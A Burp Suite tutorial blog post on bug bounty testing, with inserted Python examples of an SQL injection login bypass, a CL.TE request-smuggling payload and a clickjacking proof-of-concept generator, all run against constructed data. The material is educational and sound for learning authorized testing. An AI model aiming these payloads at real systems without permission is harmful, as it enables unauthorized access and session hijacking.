Nitin Yadav

How to Master Burp Suite for Bug Bounty Hunting and Penetration Testing to Earn Money in 2022

Do you want to earn money hacking?

Do you want to hack like a pro?



If these are the questions that bother you, then you are in the right place.


I am Nitin Yadav (KD), and today I will teach you how to master Burp Suite Pro and help you along in your hacking journey.


Hacking for money is a growing industry.


There are a variety of ways to make money hacking, from finding and exploiting vulnerabilities in software to spear-phishing and social engineering, as long as it happens inside an authorized engagement or within the scope of a bug bounty programme; the same activity without permission is simply a crime.




There are a few things you can do to get started, and we'll cover some of the most important steps in a little bit. First, you'll need to have a decent understanding of how computers work.


This doesn't have to be at an expert level, but you should at least understand the basics of how a computer, a network and a web browser operate.


Next, you'll need to learn how to use a variety of tools. Be careful what you pick up: a product like Malwarebytes is an anti-malware scanner for detecting and removing malicious software on your own machine, not an attack tool. For web testing the tools that matter are an intercepting proxy, a fuzzer and a scanner, which is exactly what this post is about.


Finally, you'll need to learn how web applications work and how they get attacked, which is where Burp Suite comes in.


The rest of this post assumes you have the knowledge discussed above.



So let's first talk about Burp Suite.


It doesn't matter whether you are a hacker, bug bounty hunter, penetration tester, developer, security professional, or just someone who wants to understand how a website works:


to understand an application you need an intercepting proxy that sits between your browser and the server, and there are several to choose from.


Some of the available proxies are listed below:

  • Fiddler

  • Paros Proxy (no longer maintained; OWASP ZAP started as a fork of it)

  • BurpSuite

  • OWASP ZAP

Here we are going to talk about BurpSuite.


So now a question arises: "What is Burp Suite?"



What is BurpSuite?


BurpSuite is a set of tools used for penetration testing of web applications. It is an integrated platform/graphical tool for performing security testing of web applications.


It is one of the most widely used tools among professional web security researchers and bug bounty hunters.


Burp has various tools which work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities.


It is a Java-based web penetration testing framework, and the Community edition is installed by default on Kali Linux.


It is developed by a company named PortSwigger and aims to be an all-in-one toolset. Its capabilities can be extended by installing add-ons called BApps, available from the BApp Store built into Burp.


So now let's understand how the tool works.


While browsing the target application we configure the browser to route its traffic through Burp's proxy listener (127.0.0.1:8080 by default). Burp then acts as a man in the middle, capturing every request to and every response from the target web application so that we can inspect and analyze them. For HTTPS sites you must first install Burp's CA certificate in the browser; otherwise you will only see certificate errors and no traffic.


As testers we can pause, manipulate and replay individual HTTP requests in order to find interesting parameters and injection points.


Injection points can be marked for manual fuzzing, or for automated fuzzing with Burp Intruder, to discover unintended application behaviour, crashes and error messages.
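To see what "manipulate and replay" means at the byte level, here is an added example (not code from the original post or from Burp itself): a captured login request (a constructed sample) is parsed, the username is swapped for a probe, a header is added, and the Content-Length is recomputed before the bytes are replayed. Recomputing the length is the step people forget when they hand-edit a request; Repeater's "Update Content-Length" option does it for you, and this shows why it matters. Host name and parameter names are invented.

```python
"""Edit a captured request the way Burp Repeater lets you: parse it, swap a
parameter for a probe, add a header, and recompute Content-Length."""
from urllib.parse import parse_qsl, urlencode

# Constructed sample: a login POST as it would appear in Burp's proxy history.
CAPTURED = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 27\r\n"
    b"\r\n"
    b"username=alice&password=pw1"
)


def parse_request(raw: bytes):
    """Split raw request bytes into (request line, list of (name, value), body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def build_request(request_line: str, headers, body: bytes) -> bytes:
    """Serialise back to bytes. Content-Length is always rewritten to the real
    body size: a stale value makes the server read too little of the body or
    hang waiting for bytes that never arrive."""
    kept = [(n, v) for n, v in headers if n.lower() != "content-length"]
    if body:
        kept.append(("Content-Length", str(len(body))))
    head = "\r\n".join([request_line] + [f"{n}: {v}" for n, v in kept])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def set_form_param(raw: bytes, name: str, value: str) -> bytes:
    """Replace (or add) one urlencoded body parameter, encoding it properly."""
    request_line, headers, body = parse_request(raw)
    params = dict(parse_qsl(body.decode("latin-1"), keep_blank_values=True))
    params[name] = value
    return build_request(request_line, headers, urlencode(params).encode())


def add_header(raw: bytes, name: str, value: str) -> bytes:
    request_line, headers, body = parse_request(raw)
    return build_request(request_line, headers + [(name, value)], body)


def declared_content_length(raw: bytes) -> int:
    _, headers, _ = parse_request(raw)
    return int({n.lower(): v for n, v in headers}["content-length"])


def body_of(raw: bytes) -> bytes:
    return raw.partition(b"\r\n\r\n")[2]


if __name__ == "__main__":
    probe = set_form_param(CAPTURED, "username", "alice' OR '1'='1")
    probe = add_header(probe, "X-Forwarded-For", "127.0.0.1")
    print(probe.decode("latin-1"))
```

Note that the probe value is URL-encoded on the way in (the quote becomes %27); when you paste payloads into Repeater by hand you have to do that yourself, or use the editor's encoding shortcut, otherwise the server decodes something different from what you intended.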


So what sets it apart from the hundreds of other web app testing frameworks, and why do most penetration testers prefer it over other tools? Its simplicity, a clean user interface, and the ability to integrate extensions that provide functionality not included by default.



Now let's look at the main classes of vulnerabilities (essentially the OWASP Top 10 of 2017) that Burp Suite's scanner can help you find. Keep in mind that a scanner is good at injection, XSS and misconfiguration checks, while access control, business logic and logging issues need a human looking at how the application behaves.

  • Injection - This includes vulnerabilities that are exploited by sending untrusted input to an interpreter as part of a query or command. Specially crafted input tricks the interpreter into executing unintended commands or handing out data without authorization. The most common type is SQL injection; others include operating system (OS) command injection and LDAP injection.

  • Broken Authentication – This includes vulnerabilities arising out of poor implementation of authentication and session management functions. Exploiting such vulnerabilities can give attackers access to passwords, credentials, session tokens, keys, etc

  • Sensitive Data Exposure – Many times, applications lack controls to protect sensitive user data like personally identifiable information (PII), health data, or even financial data. Attackers can steal such sensitive data. Lack of data encryption at rest and in transit cause most of the vulnerabilities related to sensitive data exposure.

  • XML External Entities - This is a special type of vulnerability in which an attacker abuses external entity declarations in XML documents processed by the application to launch attacks such as disclosure of sensitive internal files, server-side request forgery, denial of service and, in some configurations, remote code execution.

  • Broken Access Control - Even if a user is authenticated with valid credentials, that does not mean they should have access to every function of the application. Authorization defines what an authenticated user may access. Broken authorization lets an attacker view other users' accounts and sensitive files, or even modify other users' data.

  • Security Misconfiguration – Security misconfiguration issues are the most common in the underlying infrastructure like web servers. Insecure configurations, default credentials, unreferenced backup files, unwanted services, open cloud storage, missing security headers and cookie flags, and missing security patches all contribute to the security misconfiguration category.

  • Cross-Site Scripting - This is the classic web application vulnerability that has been on the OWASP list for a very long time. It occurs when an attacker is able to inject a script through an application input and have it execute in other users' browsers. The attack can be used to hijack user sessions by stealing cookies, to deface websites, and so on. The common types are Stored (persistent), Reflected and DOM-based.

  • Insecure Deserialization – Attackers can manipulate the object serialization and deserialization process to introduce malicious payloads resulting in code execution.

  • Using Components with Known Vulnerabilities - It's very common for developers to import third-party code to avoid reinventing the wheel. However, that third-party code sometimes comes with vulnerabilities of its own. An example is running an unpatched OpenSSL library that is still vulnerable to Heartbleed.

  • Insufficient Logging and Monitoring – Quite often, applications lack capabilities to log events that would help in case of an incident. In the absence of audit logging and detection capabilities, attackers can simply continue to infiltrate without getting detected or raising alarms.

  • And much more.
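Injection tops that list, so here it is in one picture, as an added example that is not from the original post: the same auth-bypass payload you would send from Repeater, against a login query built by string formatting and against a parameterised one. It uses an in-memory SQLite database with constructed data, and the user name and password are invented.

```python
"""Injection in one picture: the same payload you would send from Burp
Repeater, against a query built by string formatting and against a
parameterised one. Uses an in-memory SQLite database with constructed data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    # Untrusted input is pasted into the SQL text, so the interpreter cannot
    # tell data from code: a quote in the input changes the query's meaning.
    query = (f"SELECT 1 FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return db.execute(query).fetchone() is not None


def login_safe(db: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders fix the query structure up front; the input is only ever data.
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


def triggers_db_error(db: sqlite3.Connection, username: str) -> bool:
    """A stray quote is the cheapest probe: a database error in the response is
    the signal you look for in Repeater before trying a real payload."""
    try:
        login_vulnerable(db, username, "x")
        return False
    except sqlite3.OperationalError:
        return True


BYPASS = "' OR '1'='1"   # sent as the password field


def demo() -> dict:
    db = make_db()
    return {
        "vuln_bypassed": login_vulnerable(db, "alice", BYPASS),    # True
        "safe_bypassed": login_safe(db, "alice", BYPASS),          # False
        "safe_real_login": login_safe(db, "alice", "s3cret"),      # True
        "vuln_errors_on_quote": triggers_db_error(db, "alice'"),   # True
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The vulnerable query ends up as `... AND password = '' OR '1'='1'`, and since AND binds tighter than OR the row matches regardless of the password. The parameterised version sends the same string as a value and never matches.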

What is the Need for BurpSuite?

As we all know, the market for security testing tools is growing rapidly, and there are many tools available, both commercial and free.


But most of these tools lean toward automated scanning to find vulnerabilities.


This is done by first crawling (spidering) the application to map its content and then passing the discovered requests through an automated scanner, which is what Burp's "crawl and audit" scan does.


(Tip: scanners are great, but nothing beats manual testing, so always confirm a scanner finding by reproducing it yourself in Repeater. Automated results include false positives, and a report with unverified findings will cost you credibility.)


Now let's move on to some tips that will help you when testing for vulnerabilities.



Platform Authentication: Let's say the target application is protected by HTTP-level authentication at the web server (Basic, NTLM or Digest). Here we need to configure the credentials in Burp Suite; if we don't, Burp itself cannot reach the protected part of the application, and its crawler and scanner will only ever see 401 responses.


To configure platform authentication follow the steps below:

Step - 1: Open Burp's connection settings (the User options > Connections tab in older 2022 releases, or Settings > Network > HTTP in newer ones).

Step - 2: Find the Platform Authentication section and enable it with the checkbox at the top of the section.

Step - 3: Click the Add button and a popup window will appear.

Step - 4: Configure the destination host (IP address or hostname), the authentication type (Basic, NTLMv1, NTLMv2 or Digest), the username and password, and the domain if applicable.

Step - 5: Click OK. Use a dedicated test account here: these credentials are saved in your Burp user options.


Once these settings are recorded, Burp Suite can seamlessly access the protected part of the application with the help of these credentials.


Upstream Proxy Servers: Now let's say we are testing a web application in a corporate environment where the target is only reachable through another proxy, or we want to chain Burp with a second tool's proxy. Then Burp must be told to send its outgoing requests through that upstream proxy instead of connecting to the target directly.


To configure an upstream proxy server follow the steps below:

Step - 1: Open Burp's connection settings (User options > Connections in older 2022 releases, or Settings > Network > Connections in newer ones).

Step - 2: Find the Upstream Proxy Servers section and click Add.

Step - 3: Enter the destination host pattern the rule applies to (for example * for all hosts).

Step - 4: Enter the proxy host and port, and the authentication type and credentials if the upstream proxy requires them.

Step - 5: Click OK. Burp will now relay matching requests through the upstream proxy.


JSON Beautifier: JSON (JavaScript Object Notation) is a lightweight format for storing or transporting data, and one of its best aspects is that it is easy to read. APIs, however, usually send it minified on a single line.


The JSON Beautifier extension pretty-prints JSON request and response bodies in Burp's message editor, which makes it much easier to understand an API and spot interesting fields.

HTTP Request Smuggling extension: HTTP Request Smuggling attacks are tough to pull off and a lot harder to test, especially when there are restrictions in place. There are also many smuggling variants (CL.TE, TE.CL, TE.TE and so on), and it is not feasible to test them all by hand, because each one needs byte-exact Content-Length and Transfer-Encoding headers.

To get you out of your misery, HTTP Request Smuggler is a Burp Suite extension that automates the detection of request smuggling. Just open the BApp Store (Extender > BApp Store) and install it. One warning: smuggling probes can poison the front end's connection for other users, so run them only against systems you are explicitly authorized to test.
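Why the headers have to be byte-exact is easiest to see by framing the same byte stream twice, as an added example that is not part of the original post or of the extension's code: once the way a front end that honours Content-Length does it, once the way a back end that honours Transfer-Encoding: chunked does it (the CL.TE case). The attacker's request and the "victim" request that follows it on the same connection are constructed messages; the extension's real timing-based detection is not modelled here.

```python
"""Why smuggling needs byte precision: one byte stream, framed by a front end
that honours Content-Length and by a back end that honours
Transfer-Encoding: chunked (the CL.TE case). Messages are constructed."""

# Attacker's request: both headers present, and the body deliberately has one
# byte ("G") after the chunked terminator. Content-Length 6 covers "0\r\n\r\nG".
SMUGGLE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"G"
)
# Next request on the same back-end connection, e.g. from another user.
VICTIM = b"GET /account HTTP/1.1\r\nHost: target.example\r\n\r\n"
STREAM = SMUGGLE + VICTIM


def read_head(stream: bytes, pos: int):
    """Return (request line, lowercase header dict, position after the blank line)."""
    end = stream.index(b"\r\n\r\n", pos)
    lines = stream[pos:end].split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def read_chunked(stream: bytes, pos: int):
    """Decode a chunked body; return (payload, position just after the final CRLF)."""
    payload = b""
    while True:
        eol = stream.index(b"\r\n", pos)
        size = int(stream[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return payload, stream.index(b"\r\n", pos) + 2
        payload += stream[pos:pos + size]
        pos += size + 2


def frame_by_content_length(stream: bytes):
    """Front end: Transfer-Encoding is ignored, Content-Length decides."""
    frames, pos = [], 0
    while pos < len(stream):
        request_line, headers, pos = read_head(stream, pos)
        length = int(headers.get(b"content-length", b"0"))
        frames.append((request_line, stream[pos:pos + length]))
        pos += length
    return frames


def frame_by_transfer_encoding(stream: bytes):
    """Back end: chunked wins, so whatever follows the terminating chunk is
    treated as the start of the next request."""
    frames, pos = [], 0
    while pos < len(stream):
        request_line, headers, pos = read_head(stream, pos)
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            body, pos = read_chunked(stream, pos)
        else:
            length = int(headers.get(b"content-length", b"0"))
            body, pos = stream[pos:pos + length], pos + length
        frames.append((request_line, body))
    return frames


def desynced(stream: bytes) -> bool:
    """True when the two parsers disagree about where requests begin."""
    cl = [line for line, _ in frame_by_content_length(stream)]
    te = [line for line, _ in frame_by_transfer_encoding(stream)]
    return cl != te


if __name__ == "__main__":
    print("front end:", [line for line, _ in frame_by_content_length(STREAM)])
    print("back end :", [line for line, _ in frame_by_transfer_encoding(STREAM)])
```

The front end forwards one tidy POST followed by the victim's GET; the back end finishes the chunked body early and reads the victim's request line as "GGET /account HTTP/1.1", which is the classic sign of a desync. Shorten or lengthen the Content-Length by a single byte and the two parsers line up again, which is why the extension has to try exact values.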


Cloud Storage Tester: More and more companies are moving to cloud-based services.


The major players are AWS, Google Cloud and Microsoft Azure. If you are new to web application hacking, testing cloud services can be tough when you hardly know what they are or how to test them. Cloud Storage Tester comes to your rescue.


It tests for misconfiguration issues in cloud storage services (S3 buckets and their Google and Azure equivalents), hence the name. All it needs from you is a set of credentials for your own test account with the provider (an access key and its secret key); never use keys you came across while testing the target.


It then scans automatically for common misconfigurations such as buckets that let anyone list or write to them. Without credentials it can still perform some passive checks.



403bypasser: After a lot of effort you come across a potentially vulnerable endpoint, but the server answers with a 403 status code.


Believe me, there is nothing more disheartening than a 403 response.

403Bypasser automatically looks for 403 responses and tries the usual workarounds (path and header variations) to get past them. Treat a bypass as a finding only if the resource behind it really is sensitive; getting a 200 for a harmless page is not a vulnerability.


Scavenger: a Burp extension that creates a target-specific, tailored wordlist from the Burp history.

While you browse the target website through Burp, it collects the paths, parameter names and words it sees in requests and responses and builds a wordlist in the background, which you can then use when fuzzing for directories, parameters and passwords.
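The idea is simple enough to reproduce in a few lines, so here is an added example (not the extension's code) that harvests path segments and parameter names from a Burp history export. The XML below is a constructed sample modelled on the file Burp writes for "Save items" (base64-encoded request and response per item); treat the exact layout as an assumption and adjust the element names if your export differs. Host and paths are invented.

```python
"""Build a target-specific wordlist from a Burp history export, which is the
idea behind the Scavenger extension. The XML below is a constructed sample
modelled on the file Burp writes for "Save items"; treat the exact layout as an
assumption and adapt the element names if your export differs."""
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qsl, urlsplit

REQ1 = "GET /api/v2/users?sort=created&page=1 HTTP/1.1\r\nHost: target.example\r\n\r\n"
RESP1 = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
         '<a href="/admin/export">Export</a>'
         '<form><input name="csrf_token"><input name="user_id"></form>')
REQ2 = ("POST /account/settings HTTP/1.1\r\nHost: target.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "email=a%40b.test&newsletter=1")
RESP2 = "HTTP/1.1 302 Found\r\nLocation: /account/settings/saved\r\n\r\n"


def b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


HISTORY_XML = (
    "<items>"
    "<item><url><![CDATA[https://target.example/api/v2/users?sort=created&page=1]]></url>"
    f'<request base64="true"><![CDATA[{b64(REQ1)}]]></request>'
    f'<response base64="true"><![CDATA[{b64(RESP1)}]]></response></item>'
    "<item><url><![CDATA[https://target.example/account/settings]]></url>"
    f'<request base64="true"><![CDATA[{b64(REQ2)}]]></request>'
    f'<response base64="true"><![CDATA[{b64(RESP2)}]]></response></item>'
    "</items>"
)

PATH_RE = re.compile(r'["\s](/[A-Za-z0-9_./-]+)')   # "/admin/export", Location: /x/y
NAME_RE = re.compile(r'\bname="([^"]+)"')            # <input name="csrf_token">


def decode_message(node) -> str:
    text = node.text or ""
    if node.get("base64") == "true":
        return base64.b64decode(text).decode("utf-8", "replace")
    return text


def wordlist_from_history(xml_text: str) -> dict:
    """Return {"paths": [...], "params": [...]} harvested from every item."""
    paths, params = set(), set()
    for item in ET.fromstring(xml_text).iter("item"):
        parts = urlsplit(item.findtext("url") or "")
        paths.update(s for s in parts.path.split("/") if s)
        params.update(n for n, _ in parse_qsl(parts.query, keep_blank_values=True))
        request = decode_message(item.find("request"))
        response = decode_message(item.find("response"))
        head, _, body = request.partition("\r\n\r\n")
        if "application/x-www-form-urlencoded" in head:
            params.update(n for n, _ in parse_qsl(body, keep_blank_values=True))
        # Links, redirects and form actions in either direction reveal more paths.
        for message in (request, response):
            for path in PATH_RE.findall(message):
                paths.update(s for s in path.split("/") if s)
        params.update(NAME_RE.findall(response))
    return {"paths": sorted(paths), "params": sorted(params)}


if __name__ == "__main__":
    words = wordlist_from_history(HISTORY_XML)
    print("\n".join(words["paths"] + words["params"]))
```

Feed the resulting lists to Intruder as payloads: the "paths" list for directory brute force, the "params" list for hidden-parameter discovery. Because every word came from the target itself, the hit rate is far better than with a generic wordlist.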


How to find Clickjacking: Clickjacking (UI redressing) is the act of tricking a user into clicking on something other than what they think they are clicking on. The attacker loads the target page in an invisible iframe on a page they control and positions it so that a decoy the victim wants to click (a game, a prize, a "close" button) sits exactly over a real button on the framed page.


The click therefore lands on the real application, where the victim is already logged in, and the action (changing an email address, confirming a payment, granting a permission) is performed with their session and without their knowledge.


It only works if the target page can be framed from another origin, so the first thing to check is whether the response carries an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive.


To find clickjacking we will use Clickbandit, which is built into Burp. Open the Burp menu and choose Burp Clickbandit.

A dialog opens; click Copy Clickbandit to clipboard and we are ready to go.


So we have the Clickbandit code on our clipboard, and we need a browser that is configured to go through Burp (which you must have by now), so let's find a clickjacking vuln.


Once we are on the target page, open the browser's developer tools: right click > Inspect.


Move to the Console tab, paste the code we copied from Burp, and press Enter.


Clickbandit now injects its toolbar into the page in record mode.

Click Start; the page reloads with Clickbandit active and recording.


The next step is to click on the element you want to test for clickjacking, exactly as a victim would.


It records each click, so once you are done click Finish.


Clickbandit then switches to its proof-of-concept view: the page is loaded inside an iframe with a decoy button over the element you clicked. If clicking the decoy triggers the real action on the framed page, you have been clickjacked, and congrats, you found a vuln.


Two checks before you report it. First, Clickbandit's proof of concept runs inside the target's own origin, so it can succeed even when the page sends X-Frame-Options: SAMEORIGIN; save the generated HTML, host it on a different origin and confirm the frame still loads, and check the response in the proxy history for X-Frame-Options and a CSP frame-ancestors directive. Second, the clicked action has to matter (a settings change, a purchase, a permission grant); clickjacking a static page is rarely accepted by bounty programmes.
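Both checks can be scripted. The added example below is not Clickbandit's code: it decides from a response's headers whether another origin can frame the page (CSP frame-ancestors takes precedence over X-Frame-Options, and the obsolete ALLOW-FROM value is ignored by current browsers), and it writes a stand-alone proof-of-concept page to host on your own origin. The header sets, origins and URL are constructed.

```python
"""Two things to do before reporting a Clickbandit result: decide from the
response headers whether another origin can frame the page at all, and produce
a stand-alone proof of concept to host on your own origin. Sample headers are
constructed."""
from html import escape


def frameable(headers: dict, attacker_origin: str = "https://attacker.example"):
    """Return (can_frame, reason). CSP frame-ancestors overrides X-Frame-Options
    in browsers that support it, so it is evaluated first."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            sources = [t.strip("'").lower() for t in tokens[1:]]
            if "*" in sources or attacker_origin.lower() in sources:
                return True, f"frame-ancestors permits {attacker_origin}"
            return False, f"frame-ancestors {' '.join(tokens[1:])}"
    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo in ("deny", "sameorigin"):
        return False, f"X-Frame-Options: {xfo}"
    if xfo:
        # ALLOW-FROM and misspelt values are ignored by modern browsers: no protection.
        return True, f"X-Frame-Options '{xfo}' is not honoured by current browsers"
    return True, "no framing protection header"


def poc_html(target_url: str, click_x: int, click_y: int,
             bait: str = "Click to claim your prize") -> str:
    """Decoy button with a transparent iframe of the target laid over it, the
    same structure Clickbandit records. Host this on a different origin."""
    return (
        "<!doctype html>\n<style>\n"
        f"  #bait {{ position:absolute; left:{click_x}px; top:{click_y}px; z-index:1; }}\n"
        "  iframe { position:absolute; left:0; top:0; width:1200px; height:900px;\n"
        "           opacity:0; z-index:2; border:0; }\n"
        "</style>\n"
        f'<button id="bait">{escape(bait)}</button>\n'
        f'<iframe src="{escape(target_url, quote=True)}"></iframe>\n'
    )


# Constructed header sets for the cases you will meet in the proxy history.
SAMPLES = {
    "unprotected": {"Content-Type": "text/html"},
    "xfo_deny": {"X-Frame-Options": "DENY"},
    "csp_none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp_overrides_xfo": {"X-Frame-Options": "DENY",
                          "Content-Security-Policy": "frame-ancestors *"},
}

if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        print(name, frameable(hdrs))
    print(poc_html("https://target.example/account/delete", 300, 200))
```

Set opacity to a small non-zero value while you are lining up the decoy, then back to 0 for the final proof of concept; the coordinates come from the position of the real button inside the framed page, which is what Clickbandit measures for you during record mode.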



So that is it for today, guys; we will continue with more Burp Suite tips and tricks in another blog.


I hope you enjoyed this one.


Please comment down below 😊


I'll see you next time :)


Take care and stay safe!




